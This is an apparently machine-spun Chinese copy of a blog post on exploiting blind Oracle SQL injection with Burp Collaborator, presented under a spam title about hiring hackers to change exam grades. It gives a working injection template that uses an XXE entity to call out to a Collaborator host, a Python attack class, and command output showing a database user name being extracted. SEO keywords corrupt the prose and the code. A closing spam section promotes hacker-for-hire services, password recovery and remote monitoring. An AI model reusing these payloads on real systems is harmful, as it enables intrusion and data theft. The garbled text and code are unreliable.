找黑客改了考试成绩以后后悔莫及-超过检验:利用Burp Collaborator实行SQL盲注
一直一来,大家的绝大多数的渗透测试新项目全是紧紧围绕着Web应用软件和/或涉及到数据库查询后端。针对紧紧围绕着Web应用软件的测试报告而言,一般应用Burp模块会更便捷一些,另外,Burp模块还内嵌了相对的扫描枪,因此 能够用于鉴别数据库查询注入漏洞层面的安全隐患。殊不知,检验漏洞仅仅完成了渗透测试工作中的一半罢了;一个出色的渗透测试工作人员,还应当根据SQL注入这类的服务器安全漏洞来进一步扩张渗透测试的覆盖面积(自然,不可以超越渗透测试的特定范畴)。虽然Burp的扫描仪模块的特性在不断完善,但依然没法立即利用这种漏洞,因而,除开拉斯维加 *** 黑客大赛往年冠军开展手动式检测外,大多数渗透测试工作人员还必须依靠应用第三方的单独专用工具。伴随着Burp Suite 1.7.09版本号的问世,它的新作用随着产生了新的突破口:我们可以根据某类 *** 将Burp的与众不同作用与大家的数据库查询漏洞利用架构紧密结合,进而造成更为令人震撼人心的作用。
我们知道,很多 *** 服务器(乃至很多Web应用软件和自定应用软件API)都是会采用数据库查询后端开发,而且一般全是根据SQL进行相对的数据库操作的。因而,SQL注入便是这个游戏中必不可少的一部分。尽管有一些专业的专用工具能够用于利用这类漏洞,可是大家发觉,有时候更简易的专用工具可以产生高些的高效率。因而,Duncan便应时而生了,在很多状况下,它可以让SQL注入检测越来越更拉斯维加 *** 黑客大赛往年冠军加非常容易——比如,在来源于 *** 服务器的回应能够表述为2个不一样值或务必应用一些侧无线信道(一般是记时)的状况下,这二种状况一般各自称之为盲注和根据時间的SQL注入。自然,还存有别的这类的侧无线信道,仅仅都还没获得普遍应用罢了。
利用Burp Collaborator实行SQL盲注
当PortSwigger在二零一五年4月发布Burp Collaborator后,游戏的规则此后就发生变化,因为它能够检验到带外互动。因为它能够在其自身的域下运作好几个 *** 服务器(DNS、HTTP、HTTPS及高些版本号的 *** TP、IMAP和POP3 *** 服务器),并可以在发送至 *** 服务器的payload中 *** 独特的子域(比如rvqhg498gxa339ere9i1lby1dsji77.burpcollaborator.net),随后就可以监视所述 *** 服务器中涉及到这种子域的全部要求了。这促使侧无线信道进攻要比時间进攻快得多(当不可以导入延迟时间时,它是唯一的侧拉斯维加 *** 黑客大赛往年冠军无线信道),因而几个月后,该扫描机模块也刚开始应用它了。在二零一六年五月,我对第三方专用工具是不是能够应用Collaborator的概率开展了查看,她们的回应说将对开发者对外开放。来到十月,她们完成了自身的服务承诺,而且,之后还加上了一个官方网的Collaborator API。
殊不知,这一API只有用以Burp,另外,大家都没有将Duncan移殖到Burp中的准备——虽然Burp适用应用Python和Ruby撰写的软件,可是必须应用Jython和JRuby,这很有可能会产生一些出乎意料的不便。所以我刚开始建立一个通用性软件,来给Burp Collaborator和全部外界程序流程构建一座公路桥梁拉斯维加 *** 黑客大赛往年冠军。因为Burp适用多种多样服务平台,也就代表着这一当做公路桥梁的通用性软件仅有可以从多种多样计算机语言轻轻松松启用时才有现实意义,因此 我打算应用根据TCP的MessagePack——为安全起见,它仅关联到当地服务器的8452端口号上。
在相对的GitHub库房中出示了:
根据纯Java撰写的Burp 拉斯维加 *** 黑客大赛往年冠军 Extender的源码(仅有两个简易的类)
根据Python語言的简易手机客户端源码
在README文档中对该协议书的详细文字叙述
尽管编译程序这种编码是非常简易的,可是,你依然能够从https://github.com/silentsignal/burp-collab-gw/releases下载早已编译程序好的JAR文档。如今,它都还没出示GUI,仅仅简易关联来到一个硬编码的端口号上边——但是,它选用的是MIT批准,因此 ,热烈欢迎别的开发者出示GUI这类的作用。
拥有这一专用工具后,Oracle数据库查询的渗透测试便会轻轻松松多了。依据Oracle网页页面的叙述,要想对Oracle数据库查询开展根据時间的注入进攻十分艰难,由于DBMS_LOCK.SLEEP没法置入到SELECT句子中,而别的的解决 *** 则必须应用UTL_INADDR、URL_HTTP和相近的作用。殊不知,如同Burp开发者常说的那般,“他们需要的拉斯维加 *** 黑客大赛往年冠军管理权限,大家都不具有”。殊不知,同一篇博闻也详细介绍了Oracle中的XXE漏洞,假如与Collaborator融合应用得话,就能做为侧无线信道应用。
拥有他们,就可以搭建下列Duncan类:
1
2
3
4
5
6
7
8
拉斯维加 *** 黑客大赛往年冠军 9
10
11
tpl = """'||(SELECT CASE WHEN ASCII(SUBSTR(({s._query}),{s._pos},1))<{guess} \\
THEN extractValue(XMLType('<?xml version="1.0" encoding="UTF-8"?>\\
拉斯维加 *** 黑客大赛往年冠军 <!DOCTYPE poc [ <!ENTITY % s2 SYSTEM "http://{payload}/">%s2;]>'),'/l') \\
ELSE '' END FROM dual)||'"""
拉斯维加 *** 黑客大赛往年冠军 class OracleDuncan(duncan.Duncan):
def decide(self, guess):
c = Client()
payload = c.generate_payload(include_location=True)
拉斯维加 *** 黑客大赛往年冠军 requests.post(url, data={'q': tpl.format(s=self, guess=guess,
payload=payload)}, allow_redirects=False)
拉斯维加 *** 黑客大赛往年冠军 return c.fetch_collaborator_interactions_for(payload)
在Duncan中利用该模版开展猜想,随后依据它的数值为true還是false来实行一个XML实际操作,当且仅当关系式为true时,它才发信号给Collaborator。Client类来源于Python实例手机客户端,url中包括了总体目标Web应用软件,数据信息则根据URL编码的POST文章正文中的名叫q的主要参数开展推送。
因为这一Duncan架构启用decide方式时仅检测返回值是不是为“真”,因而我们可以立即回到Collaborator的互动目录,由于Python中的目录被觉得值是“真”,要是这一目录并不是空值——那样的话,代表着最少有一个Collaborator与用以注入的XML中的payload开展了互动。
这类方式不但比传统式的根据時间的进攻更快,并且还容许线程同步实际操作,由于全部要求与payload的独特标识是不相干的。下边是应用Duncan和上边的类来获取数据库查询登录名的事例。
拉斯维加 *** 黑客大赛往年冠军 1
拉斯维加 *** 黑客大赛往年冠军 2
3
4
5
6
7
8
9
10
11
12
13
14
15
拉斯维加 *** 黑客大赛往年冠军 $ time python run_duncan.py --query 'SELECT user FROM dual' \\
--charset ABCDEFGHIJKLMNOPQRSTUVWXYZ --pos-start 1 --pos-end 5 \\
--use&拉斯维加 *** 黑客大赛往年冠军nbsp;poc.OracleDuncan --threads 1
{X } VSZA5,33s user 0,03s system 27% cpu 19,518 total
$ time python run_duncan.py --query 'SELECT user FROM dual' \
拉斯维加斯黑客大赛历年冠军 --charset ABCDEFGHIJKLMNOPQRSTUVWXYZ --pos-start 1 --pos-end 5 \
--use poc.OracleDuncan --threads 2
VSZA
拉斯维加斯黑客大赛历年冠军 5,50s user 0,04s system 38% cpu 14,459 total
$ time python run_duncan.py --query 'SELECT user FROM dual' \
--charset ABCDEFGHIJKLMNOPQRSTUVWXYZ --pos-start 1 --pos-end 5 \
拉斯维加斯黑客大赛历年冠军
--use poc.OracleDuncan --threads 5VSZA
5,54s user 0,07s system 50% cpu 11,165 total
正如上面所看到的,与单线程版本相比,2线程的时间性能提升了25%,而5线程的性能则提升了40%。在本次测试中,当线程数超过5以后,就不会有明显的加速效果,但是,拉斯维加斯黑客大赛历年冠军这可能是由于被测试服务自身的原因导致的。
总结
我们希望,通过将我们的Burp Extender插件公之于众,将使Collaborator可以与其他伟大的工具桥接起来,从而能够成功利用之前被认为只有通过传统的盲注才能拉斯维加斯黑客大赛历年冠军利用的各种漏洞,进一步扩大的渗透测试的覆盖率。祝阅读愉快!感谢József Marton为本文提供Oracle数据库测试帐户。
原文链接:https://blog.silentsignal.eu/2017/01/03/beyond-detection-exploiting-blind-sql-injections-with-burp-collaborator/#more-1054
一开始接触这部电影,是因为它被评为最烧脑的电影之一。带着对烧脑电影的热爱,开始看《穆赫兰道》可能因为很多人比较。找黑客改了成绩之后后悔有没有黑客帮忙找拉斯维加斯黑客大赛历年冠军回微信密码计算机是二进制工作原理,这个跟黑客技术无关,你学黑客技术也用不着深入研究二进制。简单了解下就好。它属于计算机构成理论知识。我们通常生活中用的是十。找黑客改了成绩之后后悔可惜我是菜鸟,不会,不然可以助你一臂之力。。我没有黑客软件,不过我知道 *** 人远程监控软件可以满足你要求的!你下一个试试看。。我们团结 我们可靠 我们讲信誉 要联系我请看我百度名字 消息来源华中红客网每个网站都有个后台系统 。 后台有个管理帐号,破解这个帐号就能修改这个网站了。 没有快捷教程 ,想学的话,只能一点一点来。 我记得原来有个软件可以。找黑客改了成绩之后后悔。您好,拉斯维加斯黑客大赛历年冠军SA团队为您解答算法跟数据结构需要用语言来实现,一般是先学语言如果你先学数据结构跟算法,最后还是需要用一种语言来实现的本人乃一个数据痴迷者,在计算机的道路上,也是一个数据结构的痴迷者,现在大学里面和同学搞开发也痴迷于数据库,我就我个人的理解给你谈一谈:首先,数据。找黑客改了成绩之后后悔《黑客帝国三部曲》百度云资源密码:kdky你好,你要的资源已经分享到你这个ID下的百度云了请注意查收电脑用户的话使用你这个ID登录百度云,打开【分享。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
